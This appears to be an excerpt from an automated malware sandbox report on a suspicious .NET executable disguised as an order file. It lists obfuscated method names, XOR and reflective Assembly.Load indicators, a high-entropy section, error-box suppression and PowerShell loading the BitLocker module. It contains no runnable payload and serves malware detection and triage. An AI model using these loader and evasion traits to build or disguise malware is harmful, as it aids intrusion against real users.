                      Source: order2024-10-07_174915.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.cs.Net Code: qGHSvnZgiT System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.order2024-10-07_174915.exe.5f00000.5.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.order2024-10-07_174915.exe.3314944.0.raw.unpack, RZ.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.cs.Net Code: qGHSvnZgiT System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.cs.Net Code: qGHSvnZgiT System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_0165F508 push esp; iretd 0_2_0165F539
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_0165F462 push esp; iretd 0_2_0165F539
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA8461 pushfd ; retf 0_2_07AA846D
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C1C00 push eax; ret 8_2_065C1C01
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C1C3A pushad ; ret 8_2_065C1C41
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C1C98 pushfd ; ret 8_2_065C1CA1
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C2020 push es; ret 8_2_065C2030
                      Source: order2024-10-07_174915.exeStatic PE information: section name: .text entropy: 7.985572066441394
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, iyJguyOGUIj6nN2wqt.csHigh entropy of concatenated method names: 'Dispose', 'fh1VyYRlQD', 'GWvCdGQVhK', 'tZd00kPa2K', 'v06VaCuYcY', 'ELoVz9Njjy', 'ProcessDialogKey', 'zx3CQChkGT', 'UEoCVuSOiS', 'IKwCCuuc5J'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, bnydmYgJeoOcsLe2k4.csHigh entropy of concatenated method names: 'LMhiEmMKX5', 'cWqi5eOaQm', 'BgwivvqbZD', 'aotihv0Ida', 'HNtipTHuiK', 'svaijPRvSZ', 'OeviIFnmWY', 'a62i1iPibe', 'fopiN3HAsr', 'TlXimcdumf'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, LsTn8ZXu0oCEl1N7po.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BKXCygbZMR', 'Oa7Ca34QEP', 'GI9CzZoiyW', 'vC66QNfcJw', 'VEv6Vq3sVW', 'TMd6Ca4lB8', 'AyH66LbK1v', 'RW5SBcW3tTMGDdiHBb0'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, cDSfec1lfX3MVo74qR.csHigh entropy of concatenated method names: 'z9BOWYdxIf', 'RWIOL5Ydg1', 'YV9OPbRTDt', 's3hO3K1PDF', 'Ia3OGSm9IM', 'ybSOTCj2Ax', 'mnROtuKlKZ', 'qkgOBb5dnk', 'QUqOyb76Mc', 'gp7OaRcSIe'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.csHigh entropy of concatenated method names: 'C246sTi279', 'uJn6lIrXV8', 'NJ46OYYu5Y', 'oFM6X0bfGP', 'hMY6kQpDMk', 'xgP6oNYitW', 'K6Q6iKfdWJ', 'qX86YwFo0g', 'cqH6Mw38tU', 'xmu6bgKiqj'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, kEbYW8C6oLGeBLvKlf.csHigh entropy of concatenated method names: 'blovgcxi7', 'KvFhf3buv', 'tQcjSywxl', 'mivI34rgG', 'tr0Nkwqmp', 'F60mIrCNC', 'f1WiovlUu5lbQWWn3k', 'k92maSoqYVuejf70BR', 'hL0HNeOQK', 'DOf2wV1ev'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, L0YxqvzEekwmwdNh3n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LeuqKsoukP', 'g1xq92jdsM', 'r6LqJQRu6H', 'xXCq4UQ4d8', 'MvlqHw4moG', 'd20qqFfuEX', 'dvkq2cj3Me'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, tRmNSiDn6KV5qnyFmK.csHigh entropy of concatenated method names: 'wFBosmliUM', 'En8oOPCB7j', 'lbVokEyOb3', 'RqVoiCRswU', 'botoYrB6S9', 'CqYkGWiXIJ', 'ai7kTZmcQW', 'HQ9ktC2FLv', 'La4kBpSi1U', 'zjwkyR1ZY7'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, MPTH9sf8mZBdUlVC0P.csHigh entropy of concatenated method names: 'x2PilswNm4', 'OR0iXspIG4', 'vcMiovUUvg', 'EMpoaBiS8c', 'W79ozWZjlw', 'FqtiQ99ptW', 'N8aiVtfMKU', 'RfMiChS60a', 'culi6ECeBy', 'UujiSlJmDx'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, UF5yiaAKaKjCxPVIqB.csHigh entropy of concatenated method names: 'IPvK11e2ux', 'PPJKNAlP1r', 'ktEKDOT1bJ', 'YCZKd5qXB8', 'xmNK7NfqOH', 'YlaK0BCDMJ', 'ew6KfqKGe1', 'zA4KnJhoxs', 'zB6Kx85UL4', 'n7aKR0Uwgy'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, J6CuYcBYmLo9Njjyvx.csHigh entropy of concatenated method names: 'WBYHlEDR7u', 'BNtHOuTvib', 'NmAHXi76c3', 'Q0pHkp5a0k', 'BgwHo09Syf', 'SQ6HiplSA7', 'MTWHYTQ61G', 'fJGHMP4wUQ', 'En6HbvoLaH', 'odCHuOsYhR'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, dgLayuVQFB9FIbBrhXQ.csHigh entropy of concatenated method names: 'gA6qEGBqQw', 'DZKq5kZPfn', 'QMDqvCoTCG', 'wlvqhLfYNu', 'N3dqpfvWRs', 'CfVqjbxjTw', 'L91qI0mLa9', 'qUiq1Uh4rL', 'EakqNyiGhF', 'NGUqmmHCIm'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, wkNbLS74DMyavXxn3k.csHigh entropy of concatenated method names: 'ROfoeEWDaW', 'bH2oEUQgta', 'HfFov6gD5d', 'IndohgvGHf', 'IJ7ojpq6L5', 'l0ToIAMEE2', 'RXKoNUEehD', 'FQuoms7ADR', 'VOIRyvLKe1mno0qelp4', 'JiTCZTLxEjZtukZ1SY0'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, RElxeGmUnRpyr3q8Ph.csHigh entropy of concatenated method names: 'HoakpaXNSr', 'bickIrX3jw', 'ND3XZZo86n', 'KroX738YN8', 'KHOX0IxIRb', 'VwaXc9VcPY', 'nk9XfCwLbJ', 'W5GXnGjSo7', 'Yh0Xg4HESL', 'UcqXx1yFGt'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, T2dl0FNOhBPD44cpep.csHigh entropy of concatenated method names: 'dsCXh2KRpA', 'Ry5XjH7xn2', 'PFLX1wfpdr', 'pLZXNXsUBy', 'SmnX9oUxFY', 'UMSXJLBJaQ', 'L1HX474SD3', 'OcKXHjAWZL', 'yFlXqOxwRY', 'H4fX2NjhtN'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, VudcP5S2swIcffISEF.csHigh entropy of concatenated method names: 'kS6ViDSfec', 'ffXVY3MVo7', 'vOhVbBPD44', 'KpeVupLElx', 'Tq8V9PhrRm', 'ESiVJn6KV5', 'ksA1s2DjPbR6aRaxox', 'zDwcriy6LBVXIvlxKH', 'dImVVoGxAt', 'aSoV6fcT1y'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, mhWVR0TRV5IGcDD9i9.csHigh entropy of concatenated method names: 'PAQ4Bdwkm4', 'SZ34a2WwjS', 'Kh5HQph8pD', 'vcNHV0qvfJ', 'l5S4R7Sde6', 'rMt481mO6I', 'EuI4A46L3a', 'D9P4WERkTD', 'NEK4L9uNTB', 'FJt4PDNI1e'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, ac6wqfdeMxACwQxisR.csHigh entropy of concatenated method names: 'W1TI7NLneSFYbv4tOH6', 'zcRhWBLtNtEVFleYPfo', 'lUuoHQUY1T', 'V8qoqmlxRC', 'i4uo25XPEy', 'Dx0uyjLBvH9Op5GEJt8', 'PmxBojLPVkNIq1K1S6r'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, IksEf0V6vCFZPIeuFLN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm0r2WCWeXZ', 'c0V2L5KYPP', 'Xs92PPoonb', 'fVY2338F4R', 'Rv22GbAKXf', 'yXn2T0VaDT', 'y9W2te49yH'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, nuc5JuaCnYqoCSk5V5.csHigh entropy of concatenated method names: 'MYgqVp5Q22', 'DJOq6iURQA', 'HeoqSln6Ct', 'n0Yql5QbFW', 'qIRqOHI7WA', 'qhKqkvTsAt', 'gn4qowP4JY', 'bywHtgpFmB', 'YDmHBvFMnS', 'JntHyJCVjM'
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, tBS357VVUMcGjsnyli9.csHigh entropy of concatenated method names: 'ToString', 'CsA265rtqI', 'rna2SCoyY9', 'lDv2sW8F4b', 'cvd2l7CYUk', 'E2g2OcBmLt', 'lI42XyNctO', 'GLF2k2xwCa', 'cj396xarIwep3ppELqJ', 'nU0Pylau8aQsZKyM5Ww'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, iyJguyOGUIj6nN2wqt.csHigh entropy of concatenated method names: 'Dispose', 'fh1VyYRlQD', 'GWvCdGQVhK', 'tZd00kPa2K', 'v06VaCuYcY', 'ELoVz9Njjy', 'ProcessDialogKey', 'zx3CQChkGT', 'UEoCVuSOiS', 'IKwCCuuc5J'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, bnydmYgJeoOcsLe2k4.csHigh entropy of concatenated method names: 'LMhiEmMKX5', 'cWqi5eOaQm', 'BgwivvqbZD', 'aotihv0Ida', 'HNtipTHuiK', 'svaijPRvSZ', 'OeviIFnmWY', 'a62i1iPibe', 'fopiN3HAsr', 'TlXimcdumf'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, LsTn8ZXu0oCEl1N7po.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BKXCygbZMR', 'Oa7Ca34QEP', 'GI9CzZoiyW', 'vC66QNfcJw', 'VEv6Vq3sVW', 'TMd6Ca4lB8', 'AyH66LbK1v', 'RW5SBcW3tTMGDdiHBb0'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, cDSfec1lfX3MVo74qR.csHigh entropy of concatenated method names: 'z9BOWYdxIf', 'RWIOL5Ydg1', 'YV9OPbRTDt', 's3hO3K1PDF', 'Ia3OGSm9IM', 'ybSOTCj2Ax', 'mnROtuKlKZ', 'qkgOBb5dnk', 'QUqOyb76Mc', 'gp7OaRcSIe'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.csHigh entropy of concatenated method names: 'C246sTi279', 'uJn6lIrXV8', 'NJ46OYYu5Y', 'oFM6X0bfGP', 'hMY6kQpDMk', 'xgP6oNYitW', 'K6Q6iKfdWJ', 'qX86YwFo0g', 'cqH6Mw38tU', 'xmu6bgKiqj'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, kEbYW8C6oLGeBLvKlf.csHigh entropy of concatenated method names: 'blovgcxi7', 'KvFhf3buv', 'tQcjSywxl', 'mivI34rgG', 'tr0Nkwqmp', 'F60mIrCNC', 'f1WiovlUu5lbQWWn3k', 'k92maSoqYVuejf70BR', 'hL0HNeOQK', 'DOf2wV1ev'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, L0YxqvzEekwmwdNh3n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LeuqKsoukP', 'g1xq92jdsM', 'r6LqJQRu6H', 'xXCq4UQ4d8', 'MvlqHw4moG', 'd20qqFfuEX', 'dvkq2cj3Me'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, tRmNSiDn6KV5qnyFmK.csHigh entropy of concatenated method names: 'wFBosmliUM', 'En8oOPCB7j', 'lbVokEyOb3', 'RqVoiCRswU', 'botoYrB6S9', 'CqYkGWiXIJ', 'ai7kTZmcQW', 'HQ9ktC2FLv', 'La4kBpSi1U', 'zjwkyR1ZY7'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, MPTH9sf8mZBdUlVC0P.csHigh entropy of concatenated method names: 'x2PilswNm4', 'OR0iXspIG4', 'vcMiovUUvg', 'EMpoaBiS8c', 'W79ozWZjlw', 'FqtiQ99ptW', 'N8aiVtfMKU', 'RfMiChS60a', 'culi6ECeBy', 'UujiSlJmDx'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, UF5yiaAKaKjCxPVIqB.csHigh entropy of concatenated method names: 'IPvK11e2ux', 'PPJKNAlP1r', 'ktEKDOT1bJ', 'YCZKd5qXB8', 'xmNK7NfqOH', 'YlaK0BCDMJ', 'ew6KfqKGe1', 'zA4KnJhoxs', 'zB6Kx85UL4', 'n7aKR0Uwgy'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, J6CuYcBYmLo9Njjyvx.csHigh entropy of concatenated method names: 'WBYHlEDR7u', 'BNtHOuTvib', 'NmAHXi76c3', 'Q0pHkp5a0k', 'BgwHo09Syf', 'SQ6HiplSA7', 'MTWHYTQ61G', 'fJGHMP4wUQ', 'En6HbvoLaH', 'odCHuOsYhR'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, dgLayuVQFB9FIbBrhXQ.csHigh entropy of concatenated method names: 'gA6qEGBqQw', 'DZKq5kZPfn', 'QMDqvCoTCG', 'wlvqhLfYNu', 'N3dqpfvWRs', 'CfVqjbxjTw', 'L91qI0mLa9', 'qUiq1Uh4rL', 'EakqNyiGhF', 'NGUqmmHCIm'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, wkNbLS74DMyavXxn3k.csHigh entropy of concatenated method names: 'ROfoeEWDaW', 'bH2oEUQgta', 'HfFov6gD5d', 'IndohgvGHf', 'IJ7ojpq6L5', 'l0ToIAMEE2', 'RXKoNUEehD', 'FQuoms7ADR', 'VOIRyvLKe1mno0qelp4', 'JiTCZTLxEjZtukZ1SY0'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, RElxeGmUnRpyr3q8Ph.csHigh entropy of concatenated method names: 'HoakpaXNSr', 'bickIrX3jw', 'ND3XZZo86n', 'KroX738YN8', 'KHOX0IxIRb', 'VwaXc9VcPY', 'nk9XfCwLbJ', 'W5GXnGjSo7', 'Yh0Xg4HESL', 'UcqXx1yFGt'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, T2dl0FNOhBPD44cpep.csHigh entropy of concatenated method names: 'dsCXh2KRpA', 'Ry5XjH7xn2', 'PFLX1wfpdr', 'pLZXNXsUBy', 'SmnX9oUxFY', 'UMSXJLBJaQ', 'L1HX474SD3', 'OcKXHjAWZL', 'yFlXqOxwRY', 'H4fX2NjhtN'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, VudcP5S2swIcffISEF.csHigh entropy of concatenated method names: 'kS6ViDSfec', 'ffXVY3MVo7', 'vOhVbBPD44', 'KpeVupLElx', 'Tq8V9PhrRm', 'ESiVJn6KV5', 'ksA1s2DjPbR6aRaxox', 'zDwcriy6LBVXIvlxKH', 'dImVVoGxAt', 'aSoV6fcT1y'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, mhWVR0TRV5IGcDD9i9.csHigh entropy of concatenated method names: 'PAQ4Bdwkm4', 'SZ34a2WwjS', 'Kh5HQph8pD', 'vcNHV0qvfJ', 'l5S4R7Sde6', 'rMt481mO6I', 'EuI4A46L3a', 'D9P4WERkTD', 'NEK4L9uNTB', 'FJt4PDNI1e'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, ac6wqfdeMxACwQxisR.csHigh entropy of concatenated method names: 'W1TI7NLneSFYbv4tOH6', 'zcRhWBLtNtEVFleYPfo', 'lUuoHQUY1T', 'V8qoqmlxRC', 'i4uo25XPEy', 'Dx0uyjLBvH9Op5GEJt8', 'PmxBojLPVkNIq1K1S6r'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, IksEf0V6vCFZPIeuFLN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm0r2WCWeXZ', 'c0V2L5KYPP', 'Xs92PPoonb', 'fVY2338F4R', 'Rv22GbAKXf', 'yXn2T0VaDT', 'y9W2te49yH'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, nuc5JuaCnYqoCSk5V5.csHigh entropy of concatenated method names: 'MYgqVp5Q22', 'DJOq6iURQA', 'HeoqSln6Ct', 'n0Yql5QbFW', 'qIRqOHI7WA', 'qhKqkvTsAt', 'gn4qowP4JY', 'bywHtgpFmB', 'YDmHBvFMnS', 'JntHyJCVjM'
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, tBS357VVUMcGjsnyli9.csHigh entropy of concatenated method names: 'ToString', 'CsA265rtqI', 'rna2SCoyY9', 'lDv2sW8F4b', 'cvd2l7CYUk', 'E2g2OcBmLt', 'lI42XyNctO', 'GLF2k2xwCa', 'cj396xarIwep3ppELqJ', 'nU0Pylau8aQsZKyM5Ww'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, iyJguyOGUIj6nN2wqt.csHigh entropy of concatenated method names: 'Dispose', 'fh1VyYRlQD', 'GWvCdGQVhK', 'tZd00kPa2K', 'v06VaCuYcY', 'ELoVz9Njjy', 'ProcessDialogKey', 'zx3CQChkGT', 'UEoCVuSOiS', 'IKwCCuuc5J'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, bnydmYgJeoOcsLe2k4.csHigh entropy of concatenated method names: 'LMhiEmMKX5', 'cWqi5eOaQm', 'BgwivvqbZD', 'aotihv0Ida', 'HNtipTHuiK', 'svaijPRvSZ', 'OeviIFnmWY', 'a62i1iPibe', 'fopiN3HAsr', 'TlXimcdumf'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, LsTn8ZXu0oCEl1N7po.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BKXCygbZMR', 'Oa7Ca34QEP', 'GI9CzZoiyW', 'vC66QNfcJw', 'VEv6Vq3sVW', 'TMd6Ca4lB8', 'AyH66LbK1v', 'RW5SBcW3tTMGDdiHBb0'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, cDSfec1lfX3MVo74qR.csHigh entropy of concatenated method names: 'z9BOWYdxIf', 'RWIOL5Ydg1', 'YV9OPbRTDt', 's3hO3K1PDF', 'Ia3OGSm9IM', 'ybSOTCj2Ax', 'mnROtuKlKZ', 'qkgOBb5dnk', 'QUqOyb76Mc', 'gp7OaRcSIe'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.csHigh entropy of concatenated method names: 'C246sTi279', 'uJn6lIrXV8', 'NJ46OYYu5Y', 'oFM6X0bfGP', 'hMY6kQpDMk', 'xgP6oNYitW', 'K6Q6iKfdWJ', 'qX86YwFo0g', 'cqH6Mw38tU', 'xmu6bgKiqj'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, kEbYW8C6oLGeBLvKlf.csHigh entropy of concatenated method names: 'blovgcxi7', 'KvFhf3buv', 'tQcjSywxl', 'mivI34rgG', 'tr0Nkwqmp', 'F60mIrCNC', 'f1WiovlUu5lbQWWn3k', 'k92maSoqYVuejf70BR', 'hL0HNeOQK', 'DOf2wV1ev'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, L0YxqvzEekwmwdNh3n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LeuqKsoukP', 'g1xq92jdsM', 'r6LqJQRu6H', 'xXCq4UQ4d8', 'MvlqHw4moG', 'd20qqFfuEX', 'dvkq2cj3Me'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, tRmNSiDn6KV5qnyFmK.csHigh entropy of concatenated method names: 'wFBosmliUM', 'En8oOPCB7j', 'lbVokEyOb3', 'RqVoiCRswU', 'botoYrB6S9', 'CqYkGWiXIJ', 'ai7kTZmcQW', 'HQ9ktC2FLv', 'La4kBpSi1U', 'zjwkyR1ZY7'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, MPTH9sf8mZBdUlVC0P.csHigh entropy of concatenated method names: 'x2PilswNm4', 'OR0iXspIG4', 'vcMiovUUvg', 'EMpoaBiS8c', 'W79ozWZjlw', 'FqtiQ99ptW', 'N8aiVtfMKU', 'RfMiChS60a', 'culi6ECeBy', 'UujiSlJmDx'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, UF5yiaAKaKjCxPVIqB.csHigh entropy of concatenated method names: 'IPvK11e2ux', 'PPJKNAlP1r', 'ktEKDOT1bJ', 'YCZKd5qXB8', 'xmNK7NfqOH', 'YlaK0BCDMJ', 'ew6KfqKGe1', 'zA4KnJhoxs', 'zB6Kx85UL4', 'n7aKR0Uwgy'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, J6CuYcBYmLo9Njjyvx.csHigh entropy of concatenated method names: 'WBYHlEDR7u', 'BNtHOuTvib', 'NmAHXi76c3', 'Q0pHkp5a0k', 'BgwHo09Syf', 'SQ6HiplSA7', 'MTWHYTQ61G', 'fJGHMP4wUQ', 'En6HbvoLaH', 'odCHuOsYhR'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, dgLayuVQFB9FIbBrhXQ.csHigh entropy of concatenated method names: 'gA6qEGBqQw', 'DZKq5kZPfn', 'QMDqvCoTCG', 'wlvqhLfYNu', 'N3dqpfvWRs', 'CfVqjbxjTw', 'L91qI0mLa9', 'qUiq1Uh4rL', 'EakqNyiGhF', 'NGUqmmHCIm'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, wkNbLS74DMyavXxn3k.csHigh entropy of concatenated method names: 'ROfoeEWDaW', 'bH2oEUQgta', 'HfFov6gD5d', 'IndohgvGHf', 'IJ7ojpq6L5', 'l0ToIAMEE2', 'RXKoNUEehD', 'FQuoms7ADR', 'VOIRyvLKe1mno0qelp4', 'JiTCZTLxEjZtukZ1SY0'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, RElxeGmUnRpyr3q8Ph.csHigh entropy of concatenated method names: 'HoakpaXNSr', 'bickIrX3jw', 'ND3XZZo86n', 'KroX738YN8', 'KHOX0IxIRb', 'VwaXc9VcPY', 'nk9XfCwLbJ', 'W5GXnGjSo7', 'Yh0Xg4HESL', 'UcqXx1yFGt'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, T2dl0FNOhBPD44cpep.csHigh entropy of concatenated method names: 'dsCXh2KRpA', 'Ry5XjH7xn2', 'PFLX1wfpdr', 'pLZXNXsUBy', 'SmnX9oUxFY', 'UMSXJLBJaQ', 'L1HX474SD3', 'OcKXHjAWZL', 'yFlXqOxwRY', 'H4fX2NjhtN'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, VudcP5S2swIcffISEF.csHigh entropy of concatenated method names: 'kS6ViDSfec', 'ffXVY3MVo7', 'vOhVbBPD44', 'KpeVupLElx', 'Tq8V9PhrRm', 'ESiVJn6KV5', 'ksA1s2DjPbR6aRaxox', 'zDwcriy6LBVXIvlxKH', 'dImVVoGxAt', 'aSoV6fcT1y'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, mhWVR0TRV5IGcDD9i9.csHigh entropy of concatenated method names: 'PAQ4Bdwkm4', 'SZ34a2WwjS', 'Kh5HQph8pD', 'vcNHV0qvfJ', 'l5S4R7Sde6', 'rMt481mO6I', 'EuI4A46L3a', 'D9P4WERkTD', 'NEK4L9uNTB', 'FJt4PDNI1e'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, ac6wqfdeMxACwQxisR.csHigh entropy of concatenated method names: 'W1TI7NLneSFYbv4tOH6', 'zcRhWBLtNtEVFleYPfo', 'lUuoHQUY1T', 'V8qoqmlxRC', 'i4uo25XPEy', 'Dx0uyjLBvH9Op5GEJt8', 'PmxBojLPVkNIq1K1S6r'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, IksEf0V6vCFZPIeuFLN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm0r2WCWeXZ', 'c0V2L5KYPP', 'Xs92PPoonb', 'fVY2338F4R', 'Rv22GbAKXf', 'yXn2T0VaDT', 'y9W2te49yH'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, nuc5JuaCnYqoCSk5V5.csHigh entropy of concatenated method names: 'MYgqVp5Q22', 'DJOq6iURQA', 'HeoqSln6Ct', 'n0Yql5QbFW', 'qIRqOHI7WA', 'qhKqkvTsAt', 'gn4qowP4JY', 'bywHtgpFmB', 'YDmHBvFMnS', 'JntHyJCVjM'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, tBS357VVUMcGjsnyli9.csHigh entropy of concatenated method names: 'ToString', 'CsA265rtqI', 'rna2SCoyY9', 'lDv2sW8F4b', 'cvd2l7CYUk', 'E2g2OcBmLt', 'lI42XyNctO', 'GLF2k2xwCa', 'cj396xarIwep3ppELqJ', 'nU0Pylau8aQsZKyM5Ww'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
